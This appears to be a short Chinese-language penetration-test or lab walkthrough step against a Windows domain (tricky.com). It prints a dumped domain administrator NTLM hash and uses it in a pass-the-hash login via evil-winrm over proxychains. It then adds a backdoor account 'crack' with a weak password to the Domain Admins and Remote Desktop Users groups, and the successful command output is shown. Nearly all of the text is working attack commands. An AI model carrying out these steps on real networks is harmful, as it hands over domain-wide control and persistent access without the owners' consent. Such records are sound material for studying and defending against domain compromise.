172.16.243.150

从151获取域管的hash：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:48989de6a73f952ad51adceabc13cc9c::: proxychains4 evil-winrm -u [tricky.com](<http://tricky.com/>)\\\\administrator -H 48989de6a73f952ad51adceabc13cc9c -i 172.16.64.150

增加一个用户，并加入域管理员组和远程桌面组。

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net user crack Passw0rd! /add /domain**
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
The command completed successfully.

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net localgroup "Remote Desktop Users" crack /add /domain**
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
The command completed successfully.

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net group "domain admins" crack /add /domain**
The command completed successfully.

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>